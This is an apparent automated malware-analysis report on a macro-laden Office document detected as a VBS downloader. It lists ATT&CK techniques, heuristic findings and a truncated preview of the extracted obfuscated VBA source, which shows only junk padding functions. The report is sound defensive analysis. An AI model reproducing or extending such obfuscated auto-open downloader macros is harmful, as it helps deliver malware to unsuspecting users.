MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and uses CreateObject, a common technique for executing arbitrary code. ClamAV identifies this as a VBSDownloader, suggesting the macro's purpose is to download and execute a secondary payload. No specific family could be identified, but the behavior is consistent with macro-based malware.
Heuristics 7
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11458 bytes |
SHA-256: 493627d5bb96b264de44e0b71334afef282bfacfb920136c126bb351f78869e2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function YyZXNSWW() mvmkmcrXG = 2580 Dim WLneuCcWTb(2580) WLneuCcWTb(1141) = WAYLRBfW WLneuCcWTb(1308) = rPSAtLfF WLneuCcWTb(1724) = VHhfxRhS WLneuCcWTb(1372) = fWVVwagfn WLneuCcWTb(1837) = rnzMzpKcZa WLneuCcWTb(1383) = fKXzcWU ensUCNzcS = "FfMvmwLnME" nNPuMCvarUs = "XpzLNBWa" UAePapVDmf = "SkMDfPacp" dtRtVXTv = "XvRuWTmVu" PayckKTHYpE = "TGcTacwxcFa" WENVNALy = "nmbtUNT" UEkMFBdxcE = "aYpEFNNTuT" XByaLdggu = "VHBTaRAbWmh" pyBeWzZRp = "fhNDtHb" GKaPYuEX = "DcrNDMm" WuYmpYWYV = "LteTUFgT" sTYxXGhDW = "rstgFvWe" veKmACGRPt = "UymkVNXF" APLVyzE = "ABycpHCnpn" EwyFMUU = "ynsEFDLWwNs" DRFDZpxZ = "GssunKv" RCFbaEE = "avzMCrkThn" NSEsaTXP = "LPDwLeS" End Function Function PsmGkeWTG() vTKysDXMKMK = 1454 Dim EuGRzPaE(1454) EuGRzPaE(249) = rKUSExNwmGc EuGRzPaE(169) = TMPgZmG EuGRzPaE(368) = CTLKrxYeKCC EuGRzPaE(377) = mMsxmRF EuGRzPaE(1128) = paBTeDVtG EuGRzPaE(1173) = AWLhYgkM EuGRzPaE(257) = sEnRtnra EuGRzPaE(1211) = nVmHnZLn EuGRzPaE(865) = tYUvUMCu KkbDCHfg = "AHcUzLsC" AxXeptR = "FFbHNLhbeUz" kxTDRet = "KamvBLaXX" zhDBFKEe = "bafMnYUHM" zUGvTMVk = "wxtwgms" GLzWZhLHmt = "txFMZny" End Function Function UFDSXgbG() DwZDrbHgMB = 9043 Dim MCmBCVMBWFt(9043) MCmBCVMBWFt(2014) = rspRFKEcDE MCmBCVMBWFt(2045) = kDLNPnU MCmBCVMBWFt(2513) = vhvTPLfC MCmBCVMBWFt(7044) = VSHBdCYa MCmBCVMBWFt(4323) = cszHaweMAg MCmBCVMBWFt(295) = dsrMdVTbb MCmBCVMBWFt(4492) = kPxXLdkfF MCmBCVMBWFt(4495) = PswLFVBRk MCmBCVMBWFt(8765) = MwEuvMbbreu WDtXAvCMLh = "ZcVtSVvD" bHMhkrruH = "wkxcfxGh" wYcTHZDKFN = "SWFyFsMBbz" LmhutsBSfa = "bHvWaLMm" zxxmbhyWBKc = "ekrgRGLWck" AbGeKGBsy = "WNBAknHc" EWPYmUCAxK = "nkuhCfWyTsZ" abcEMEuGtt = "rhwMtPCpR" HaYAExS = "NUZaxvNNp" PXHxbcUYwrY = "XvDbNnaNZVp" BSavtbb = "ddGmCBZeuea" NFksZTWym = "pasFYkwmGu" vYZSRYBS = "NVeHWxWM" FZwMHzEUxDV = "TpnsZRVNsp" GFeZYLDY = "wTXLCAMzutT" ekRzLByhcu = "kGkLNAh" LUHaVBBrrKf = "TXVYScaPR" pspnLeh = "UmDauVt" NEFLRGNz = "ScavNrTX" vRBHwVgpX = "KukUpfrGct" xzTLpBhsPg = "suNAuGKEz" uvyBrKwwXd = "kywrBHM" AbCekde = "znpWnWu" LAHvhKp = "FskkTyBm" End Function Function CPeYTxkYr() yTDXCECe = 320 Dim LBTVLpzEL(320) LBTVLpzEL(311) = yYUArfxx LBTVLpzEL(148) = XWeNsWTVN LBTVLpzEL(108) = CanNWhkM LBTVLpzEL(105) = vHhfEgxfPF LBTVLpzEL(166) = RNMRfUHBzfx LBTVLpzEL(255) = umNYVRv LBTVLpzEL(299) = hPAKYEFA LBTVLpzEL(105) = sEsMvNhcGw LBTVLpzEL(293) = BuzWLygDkE LBTVLpzEL(303) = sTvbafh vnzbksXpk = "vrwusTmtagN" ePCNUaPbGVp = "xPDFaevfU" YLxWaMTx = "TGUSUyUvztS" VNWZuCaD = "HBruHMYf" RDgterWAL = "dKSGWkpkbv" DDTrYtWzzG = "xhEbCPD" wDyHMsezCd = "ZpbMYNwAhr" HamMfYA = "MnfnLfEBe" zZdpGckh = "mAnPctrMR" kTsndRVbBEu = "skdcZrGHy" XrrhthNk = "XXYfDVN" WHkxzBaNpXL = "DgweApPk" uSwYXrM = "cpsnMhFuP" CvnkXDZbX = "MdwUCWGuAM" XFRNFtnfEEh = "wpZWvfZNVTf" xNLfmHzz = "xPycvdvPDsp" ZSSKKtZa = "HfUmDaNrB" WAmKSXnM = "GAdUEdxktET" sdxUWUNU = "DXZnLWCkLba" mTptMedkDdb = "ZyxZXeUAE" BnCWzvheyh = "hkHgsHDEGam" sGKbSfx = "bwkdwWNsy" fnCBybFru = "pbaMgavVLt" ztHLKPYGF = "sLCKtkRMYc" zBuXfczZ = "ZmFAedRVpY" FxGbBVBxVT = "PnmnpnTRtbV" dRWBcdXE = "NEnrGev" End Function Function yZWFtVMPVhF() UYGTvucpx = 4293 Dim mdYKBBszM(4293) mdYKBBszM(2154) = XwcDBeWmWxT mdYKBBszM(4238) = KWttKfBwzk mdYKBBszM(2032) = zCgcPvLSpRa mdYKBBszM(1087) = CtZnXpZbU mdYKBBszM(953) = WhAKKtV mdYKBBszM(198) = FdSetNEC mdYKBBszM(885) = xrKsEBDyae mdYKBBszM(2830) = LZFUfXBaaN mdYKBBszM(3853) = rmrrguK mdYKBBszM(55) = aTUzdVUast mdYKBBszM(1072) = ScPgDRrKDKc mdYKBBszM(344) = yaGwLtFYPXr mdYKBBszM(1720) = yVShadwZdu mdYKBBszM(723) = pSSYXVg mdYKBBszM(1513) = yxMzLEssN mdYKBBszM(3 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.